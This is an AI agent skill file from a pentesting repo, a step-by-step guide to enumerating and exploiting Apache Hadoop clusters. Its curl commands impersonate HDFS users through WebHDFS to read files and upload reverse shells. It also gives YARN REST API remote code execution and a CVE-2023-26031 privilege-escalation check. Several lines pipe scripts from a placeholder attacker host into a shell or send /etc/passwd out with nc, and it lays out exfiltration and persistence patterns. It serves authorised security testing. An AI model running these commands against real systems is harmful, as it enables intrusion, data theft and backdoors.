Hacktricks-skills hadoop-pentest

How to enumerate and exploit Apache Hadoop clusters during penetration testing. Use this skill whenever you need to assess Hadoop security, test HDFS/WebHDFS access, exploit YARN RCE vulnerabilities, or check for CVE-2023-26031. Trigger on any mention of Hadoop, HDFS, YARN, MapReduce, distributed data processing security, or when you see ports 50030, 50060, 50070, 50075, 50090, 8088, 8042, 8031, 8032, 9870, 9864, or 14000 in a pentest engagement.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop/SKILL.MD
source content

Hadoop Pentesting Skill

This skill helps you enumerate and exploit Apache Hadoop clusters during penetration testing. Hadoop is an open-source framework for distributed storage and processing of large datasets across computer clusters.

Quick Reference: Hadoop Ports

Port          Service               Notes
50030         JobTracker            Legacy MapReduce
50060         TaskTracker           Legacy MapReduce
50070 / 9870  NameNode (WebHDFS)    Primary target for file operations
50075 / 9864  DataNode              Block storage
50090         Secondary NameNode    Metadata backup
8088          YARN ResourceManager  REST API & web UI - RCE target
8042          YARN NodeManager      Container management
8031 / 8032   YARN RPC              Often unauthenticated
14000         HttpFS                Alternative WebHDFS gateway

Step 1: Enumerate Hadoop Services

Start by identifying which Hadoop services are exposed. Use Nmap with the built-in Hadoop scripts:

# Full Hadoop enumeration
nmap -p 50030,50060,50070,50075,50090,8088,8042,8031,8032,9870,9864,14000 \
  --script hadoop-jobtracker-info,hadoop-tasktracker-info,hadoop-namenode-info,\
  hadoop-datanode-info,hadoop-secondary-namenode-info \
  <target>

# Or use the bundled script
./scripts/enumerate-hadoop.sh <target>

Key insight: Hadoop's default "simple" authentication trusts whatever username the client supplies, so a stock install effectively has no authentication. This is your primary attack vector.
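A fast way to confirm this before heavier tooling is to probe WebHDFS with no credentials and classify the answer. A minimal sketch (is_webhdfs_open is a hypothetical helper, not one of the bundled scripts; it works on a captured response body so the decision logic stays separate from the network call):

```shell
# Classify a WebHDFS LISTSTATUS response body (hypothetical helper).
# An open cluster returns a FileStatuses JSON object; a secured one
# typically answers with an authentication error.
is_webhdfs_open() {
  case "$1" in
    *FileStatuses*)                  echo "open" ;;
    *Authentication*|*Unauthorized*) echo "auth-required" ;;
    *)                               echo "unknown" ;;
  esac
}

# In practice:
#   body=$(curl -s "http://<host>:50070/webhdfs/v1/?op=LISTSTATUS&user.name=hdfs")
#   is_webhdfs_open "$body"
```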

Step 2: Exploit WebHDFS (Port 50070/9870/14000)

When security=off, you can impersonate any user with the user.name parameter. This is the most common misconfiguration.

List HDFS directories

# List root directory
curl "http://<host>:50070/webhdfs/v1/?op=LISTSTATUS&user.name=hdfs"

# List specific path
curl "http://<host>:50070/webhdfs/v1/user/<username>/?op=LISTSTATUS&user.name=hdfs"

Read arbitrary files from HDFS

# Read configuration files
curl -L "http://<host>:50070/webhdfs/v1/etc/hadoop/core-site.xml?op=OPEN&user.name=hdfs"
curl -L "http://<host>:50070/webhdfs/v1/etc/hadoop/hdfs-site.xml?op=OPEN&user.name=hdfs"
curl -L "http://<host>:50070/webhdfs/v1/etc/hadoop/yarn-site.xml?op=OPEN&user.name=hdfs"

# Read user data
curl -L "http://<host>:50070/webhdfs/v1/user/<username>/data.csv?op=OPEN&user.name=hdfs"

Upload payloads

# Upload a web shell or binary
curl -X PUT -T ./payload.sh \
  "http://<host>:50070/webhdfs/v1/tmp/payload.sh?op=CREATE&overwrite=true&user.name=hdfs" \
  -H 'Content-Type: application/octet-stream'

# Upload an executable
curl -X PUT -T ./reverse_shell \
  "http://<host>:50070/webhdfs/v1/tmp/reverse_shell?op=CREATE&overwrite=true&user.name=hdfs" \
  -H 'Content-Type: application/octet-stream'

Use the bundled script for common WebHDFS operations:

./scripts/webhdfs-abuse.sh <host> <port> <operation> <path>

Operations: list, read, upload, download
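The exact contents of webhdfs-abuse.sh are not shown here, but its core is just URL construction. A minimal sketch of that piece, assuming the same user.name=hdfs impersonation as above (webhdfs_url is a hypothetical helper, not necessarily how the bundled script is written):

```shell
# Build the WebHDFS URL for an operation (hypothetical helper).
webhdfs_url() {
  host=$1; port=$2; op=$3; path=$4
  base="http://$host:$port/webhdfs/v1$path"
  case "$op" in
    list)     echo "$base?op=LISTSTATUS&user.name=hdfs" ;;
    read)     echo "$base?op=OPEN&user.name=hdfs" ;;
    upload)   echo "$base?op=CREATE&overwrite=true&user.name=hdfs" ;;
    download) echo "$base?op=OPEN&user.name=hdfs" ;;
  esac
}

# e.g. curl -L "$(webhdfs_url 10.0.0.5 9870 read /etc/hadoop/core-site.xml)"
```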

Step 3: Exploit YARN Unauthenticated RCE (Port 8088)

The ResourceManager REST API accepts job submissions with no authentication in default "simple" mode. This allows arbitrary command execution without needing HDFS write access.

Method 1: DistributedShell (Recommended)

# 1) Get an application ID
APP_ID=$(curl -s -X POST http://<host>:8088/ws/v1/cluster/apps/new-application | \
  jq -r '."application-id"')

# 2) Submit a job with your command
curl -s -X POST http://<host>:8088/ws/v1/cluster/apps \
  -H 'Content-Type: application/json' \
  -d '{
    "application-id":"'"$APP_ID"'",
    "application-name":"pwn",
    "am-container-spec":{
      "commands":{"command":"/bin/bash -c \"curl http://<attacker>/p.sh|sh\""}
    },
    "application-type":"YARN"
  }'
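The submission body can be generated rather than typed by hand. A minimal sketch (yarn_payload is a hypothetical helper; note the naive printf quoting does no JSON escaping, so avoid double quotes inside the command):

```shell
# Build the YARN app-submission JSON shown above (hypothetical helper;
# the command string is not JSON-escaped).
yarn_payload() {
  app_id=$1; cmd=$2
  printf '{"application-id":"%s","application-name":"pwn","am-container-spec":{"commands":{"command":"%s"}},"application-type":"YARN"}' \
    "$app_id" "$cmd"
}

# curl -s -X POST http://<host>:8088/ws/v1/cluster/apps \
#   -H 'Content-Type: application/json' -d "$(yarn_payload "$APP_ID" 'id')"
```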

Method 2: Using the bundled script

./scripts/yarn-rce.sh <host> <command>

# Examples:
./scripts/yarn-rce.sh 10.0.0.5 "whoami"
./scripts/yarn-rce.sh 10.0.0.5 "curl http://attacker/reverse.sh|sh"
./scripts/yarn-rce.sh 10.0.0.5 "cat /etc/passwd | nc attacker 4444"

Method 3: YARN RPC (Ports 8031/8032)

If these ports are exposed, older clusters allow job submission over protobuf without authentication. Treat these as RCE vectors as well.

Step 4: Check for CVE-2023-26031 (Local PrivEsc)

Hadoop 3.3.1–3.3.4 container-executor loads libraries from a relative RUNPATH. If you can run YARN containers (including via remote submission on insecure clusters), you may drop a malicious libcrypto.so in a writable path and get root when container-executor runs with SUID.

Check for vulnerability

# Check RUNPATH configuration
readelf -d /opt/hadoop/bin/container-executor | grep 'RUNPATH\|RPATH'
# Vulnerable if it contains $ORIGIN/:../lib/native/

# Check SUID bit
ls -l /opt/hadoop/bin/container-executor
# SUID+root makes it exploitable

# Check Hadoop version
hadoop version
# Vulnerable: 3.3.1, 3.3.2, 3.3.3, 3.3.4
# Fixed: 3.3.5+

Use the bundled check script

./scripts/check-cve-2023-26031.sh

This script will:

  1. Check if container-executor exists
  2. Verify SUID bit is set
  3. Check RUNPATH for vulnerable configuration
  4. Report Hadoop version
  5. Provide exploitation guidance if vulnerable
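The decision logic behind those checks can be sketched as small predicates over captured command output (hypothetical helpers, not the bundled script itself):

```shell
# Each predicate takes already-captured output, so the decision logic
# is separate from running readelf/ls/hadoop on the target.
runpath_vulnerable() {  # arg: readelf -d RUNPATH/RPATH line(s)
  case "$1" in *'$ORIGIN/:../lib/native/'*) return 0 ;; *) return 1 ;; esac
}
suid_root() {           # arg: ls -l output for container-executor (crude match)
  case "$1" in -rws*root*) return 0 ;; *) return 1 ;; esac
}
version_vulnerable() {  # arg: version string, e.g. "3.3.4"
  case "$1" in 3.3.[1-4]) return 0 ;; *) return 1 ;; esac
}

# Exploitable only when all three hold:
#   runpath_vulnerable "$(readelf -d "$BIN" | grep 'RUNPATH\|RPATH')" &&
#   suid_root "$(ls -l "$BIN")" &&
#   version_vulnerable "$(hadoop version | awk 'NR==1{print $2}')"
```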

Step 5: Kerberos-Enabled Clusters

If Kerberos is enabled, anonymous requests fail, but you can still authenticate with a valid ticket via SPNEGO:

# Use existing Kerberos ticket
curl --negotiate -u : "http://<host>:50070/webhdfs/v1/?op=LISTSTATUS"

# Or with specific ticket
curl --negotiate -u : -H "Authorization: Negotiate <ticket>" \
  "http://<host>:50070/webhdfs/v1/?op=LISTSTATUS"
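Before attempting SPNEGO, it is worth confirming a TGT is actually present in the credential cache. A minimal sketch (has_tgt is a hypothetical helper that just pattern-matches klist output):

```shell
# Return success if klist output shows a ticket-granting ticket
# (hypothetical helper; crude string match on krbtgt/).
has_tgt() {
  case "$1" in *krbtgt/*) return 0 ;; *) return 1 ;; esac
}

# if has_tgt "$(klist 2>/dev/null)"; then
#   curl --negotiate -u : "http://<host>:50070/webhdfs/v1/?op=LISTSTATUS"
# fi
```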

Common Attack Patterns

Pattern 1: Full Cluster Compromise

  1. Enumerate with Nmap
  2. Read HDFS configuration files to understand cluster topology
  3. Upload reverse shell to /tmp/ via WebHDFS
  4. Submit YARN job to execute the shell
  5. Check for CVE-2023-26031 for privilege escalation
  6. Pivot to other nodes using discovered credentials

Pattern 2: Data Exfiltration

  1. Enumerate HDFS directories
  2. Identify sensitive data paths (user data, configs, credentials)
  3. Download files via WebHDFS op=OPEN
  4. For large files, use op=OPEN with the offset and length parameters to fetch chunks
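Chunked downloads via offset/length can be scripted. A minimal sketch (chunk_urls is a hypothetical helper; WebHDFS OPEN accepts offset and length query parameters):

```shell
# Emit one OPEN URL per chunk of a large file (hypothetical helper).
chunk_urls() {
  host=$1; port=$2; path=$3; size=$4; chunk=$5
  off=0
  while [ "$off" -lt "$size" ]; do
    echo "http://$host:$port/webhdfs/v1$path?op=OPEN&user.name=hdfs&offset=$off&length=$chunk"
    off=$((off + chunk))
  done
}

# for u in $(chunk_urls <host> 9870 /user/data/big.csv 1073741824 134217728); do
#   curl -sL "$u" >> big.csv
# done
```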

Pattern 3: Persistence

  1. Upload malicious scripts to HDFS
  2. Create YARN jobs that run periodically
  3. Modify Hadoop configuration if write access allows
  4. Install backdoors in container-executor if CVE-2023-26031 is present

Important Notes

  • Default configuration is insecure: Hadoop ships with security=off by default
  • No Metasploit support: Use Nmap scripts and manual exploitation
  • Kerberos is optional: Many deployments never enable it
  • YARN RPC ports are often forgotten: Check 8031/8032 even if 8088 is filtered
  • CVE-2023-26031 is critical: If you have YARN access, always check for this


Scripts

This skill includes the following helper scripts in scripts/:

  • enumerate-hadoop.sh - Nmap-based Hadoop service enumeration
  • webhdfs-abuse.sh - WebHDFS operations (list, read, upload, download)
  • yarn-rce.sh - YARN RCE exploitation via DistributedShell
  • check-cve-2023-26031.sh - CVE-2023-26031 vulnerability check

Run ./scripts/<script-name>.sh --help for usage details.